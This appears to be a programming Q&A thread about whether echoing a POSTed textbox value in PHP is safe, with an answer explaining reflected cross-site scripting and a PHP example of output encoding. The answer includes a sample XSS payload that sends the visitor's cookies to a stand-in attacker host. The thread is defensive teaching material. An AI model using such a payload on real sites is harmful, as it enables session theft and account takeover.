dpthuyh1678 2016-02-15 20:49
68 views
Accepted

PHP file inclusion

I have a textbox in which a user inputs a value and a PHP script echoes it out. The textbox is sent to the server via POST and is saved in a variable called Temp.

If I create the output script with the line below, will the echo prevent file inclusion or arbitrary PHP injection, assuming that no validation is being done?

<?php echo $Temp; ?>

4 answers

  • dongzongxun8491 2016-02-16 11:44

    This is a classic reflected Cross Site Scripting vulnerability. Injected code will not execute on the server.

    A malicious user could set up their own site that POSTs to your form. The POSTed value could be something like

    <script>
    new Img().src = 'https://evil.example.com?' + escape(document.cookie);
    </script>
    

    When a user who is logged into your site visits the malicious page, the attacker will retrieve the user's cookies for your site (well, any that are not marked as HttpOnly). To mitigate this, do the following:

    <?php echo htmlentities($Temp); ?>
    

    which will display any script as HTML rather than execute it.

    Accepted answer (selected by the asker)
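As an added example (not code from the question or from the accepted answer), the question's raw echo beside a hardened version, run over a constructed input so the difference in the emitted HTML is visible; it also reuses the encoder for the textbox's own value attribute. The only name taken from the page is `$Temp`; its value here is a constructed sample, not real POST data.

```php
<?php
// Added example, not the question's or the answer's code. $Temp is a
// constructed sample standing in for the POSTed textbox value.
declare(strict_types=1);

// Constructed input containing every character that matters in HTML: < > " ' &
$Temp = "<script>alert('x')</script> & \"quoted\"";

// What the question's script does: the value is concatenated into the page
// unchanged, so the browser parses it as markup rather than as text.
function renderUnsafe(string $value): string
{
    return "<p>You entered: {$value}</p>";
}

// Hardened encoder for HTML context. ENT_QUOTES encodes both quote styles
// (it only became part of the default flags in PHP 8.1), ENT_SUBSTITUTE
// replaces invalid byte sequences instead of returning an empty string, and
// the explicit charset avoids depending on the default_charset ini setting.
function encodeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Text-node context: same position as the answer's htmlentities() call.
function renderSafe(string $value): string
{
    return "<p>You entered: " . encodeHtml($value) . "</p>";
}

// Attribute context: refilling the textbox with the submitted value. Because
// " and ' are encoded, the value cannot close the attribute, provided the
// attribute itself is quoted in the template (as it is here).
function renderTextbox(string $value): string
{
    return '<input type="text" name="Temp" value="' . encodeHtml($value) . '">';
}

echo renderUnsafe($Temp), PHP_EOL;
echo renderSafe($Temp), PHP_EOL;
echo renderTextbox($Temp), PHP_EOL;

// Self-check: no raw angle bracket or quote from the input survives encoding.
assert(strpbrk(encodeHtml($Temp), '<>"\'') === false);
```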
